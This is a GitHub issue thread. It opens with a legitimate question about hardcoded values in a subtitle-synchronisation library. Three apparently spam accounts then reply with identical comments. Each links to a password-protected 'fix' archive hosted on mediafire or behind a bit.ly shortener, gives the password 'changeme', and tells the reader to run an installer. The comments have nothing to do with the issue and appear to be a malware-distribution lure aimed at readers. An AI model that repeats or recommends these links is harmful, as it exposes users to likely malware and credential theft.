### ISSUE TITLE
Hardcoded wrongly

### ISSUE THREAD

**Issue by qgustavor** [qgustavor/douki#2]
https://github.com/qgustavor/douki/blob/2e8e9010905f16d37d5e4fc212589b767e3cd28e/lib/synchronize-subtitles.js#L20

Why .substr(65)?

https://github.com/qgustavor/douki/blob/2e8e9010905f16d37d5e4fc212589b767e3cd28e/lib/utils/ffmpeg.js#L64

Should be s16le, not wav.

**Comment by mengyanshou** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
